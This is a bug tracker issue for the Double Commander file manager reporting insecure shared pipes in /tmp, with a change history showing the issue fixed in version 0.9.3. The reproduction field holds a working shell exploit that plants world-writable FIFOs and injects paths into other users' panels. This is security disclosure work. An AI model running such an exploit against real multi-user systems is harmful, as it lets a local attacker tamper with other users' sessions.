View Issue Details
| ID | Project | Category | View Status | Date Submitted | Last Update |
|---|---|---|---|---|---|
| 0002276 | Double Commander | Default | public | 2019-04-05 10:29 | 2021-10-29 23:21 |
| Reporter | ginggs | Assigned To | Alexx2000 | ||
| Priority | normal | Severity | major | Reproducibility | always |
| Status | closed | Resolution | fixed | ||
| Projection | none | ETA | none | ||
| Platform | Linux | OS | Debian | OS Version | 10 |
| Product Version | 0.9.1 | Product Build | 8649 | ||
| Target Version | 0.9.3 | Fixed in Version | 0.9.3 | ||
| Summary | 0002276: insecure use of /tmp | ||||
| Description | From: https://bugs.debian.org/926223 Double Commander uses /tmp/doublecmd--<uid> for communication, even when this file is owned by another user. Local attacker could exploit this to load paths into other users' panels. Proof-of-concept exploit is attached. Please move the communication pipe out of /tmp. | ||||
| Steps To Reproduce | #!/bin/sh set -e -u cd /tmp getent passwd | while IFS=: read -r user _ uid _ do fifo="doublecmd--$uid" rm -f "$fifo" || true # maybe stale fifo from the previous exploit run? if ! mkfifo -m 666 "$fifo" then printf 'Failed to mount the exploit against %s; Maybe try again later?\n' "$user" continue fi done while true do for uid in $(ps --no-headers -C doublecmd -o uid) do sleep 1 fifo="doublecmd--$uid" path=$(find /bin /sbin /usr/bin /usr/sbin /usr/games | shuf -n 1) len=${#path} pad=$((1024-len)) { printf '\1\5\20\0\0\5\20\0\0\0\1%02050d' | tr '0' '\0' printf '%s' "$path" printf "%0${pad}d\1%01024d" | tr '0' '\0' } > "$fifo" done sleep 1 done | ||||
| Tags | No tags attached. | ||||
| Fixed in Revision | 8778-8780, 8783, 8796-8797, 8803 | ||||
| Operating system | Linux | ||||
| Widgetset | GTK2, Qt5 | ||||
| Architecture | 32-bit, 64-bit | ||||
|
|
I am not sure that it's a bug, as I understood it's Unix filesystem specification. But maybe I found bug: $: mkdir -p ~/.local/bin && mkdir -p ~/.local/tmp && cd ~/.local/bin $: echo $'#!/bin/sh\n\nexport TMPDIR=$HOME/.local/tmp\nexec /usr/bin/doublecmd "$@"' > doublecmd $: chmod 755 ./doublecmd $: ./doublecmd (~/.local/bin in my PATH by default) but it doesn't work, DC uses /tmp/_dcXXXXXX/ instead $HOME/.local/tmp/_dcXXXXXX. Why? It's strange, as I see GetTempDir try to get TMPDIR value before getting /tmp and in this case TMPDIR is not empty. P.S. I think it can be good question for FAQ. |
|
|
> but it doesn't work, DC uses /tmp/_dcXXXXXX/ instead $HOME/.local/tmp/_dcXXXXXX. It seems it works fine now. |
| Date Modified | Username | Field | Change |
|---|---|---|---|
| 2019-04-05 10:29 | ginggs | New Issue | |
| 2019-04-05 14:30 | Skif_off | Note Added: 0003129 | |
| 2019-04-05 14:32 | Skif_off | Note Edited: 0003129 | |
| 2019-04-05 14:33 | Skif_off | Note Edited: 0003129 | |
| 2019-04-05 19:38 | Skif_off | Note Edited: 0003129 | |
| 2019-04-06 21:42 | Alexx2000 | Fixed in Revision | => 8778-8779 |
| 2019-04-06 21:42 | Alexx2000 | Assigned To | => Alexx2000 |
| 2019-04-06 21:42 | Alexx2000 | Status | new => resolved |
| 2019-04-06 21:42 | Alexx2000 | Resolution | open => fixed |
| 2019-04-06 21:42 | Alexx2000 | Target Version | => 0.9.3 |
| 2019-04-06 21:50 | Alexx2000 | Fixed in Revision | 8778-8779 => 8778-8780 |
| 2019-04-14 19:00 | Alexx2000 | Fixed in Revision | 8778-8780 => 8778-8780, 8783 |
| 2019-04-16 18:50 | Skif_off | Note Added: 0003133 | |
| 2019-05-03 22:31 | Alexx2000 | Fixed in Revision | 8778-8780, 8783 => 8778-8780, 8783, 8796 |
| 2019-05-03 22:57 | Alexx2000 | Fixed in Revision | 8778-8780, 8783, 8796 => 8778-8780, 8783, 8796-8797 |
| 2019-05-05 18:38 | Alexx2000 | Fixed in Revision | 8778-8780, 8783, 8796-8797 => 8778-8780, 8783, 8796-8797, 8803 |
| 2019-05-05 18:38 | Alexx2000 | Fixed in Version | => 0.9.3 |
| 2021-10-29 23:21 | Alexx2000 | Status | resolved => closed |
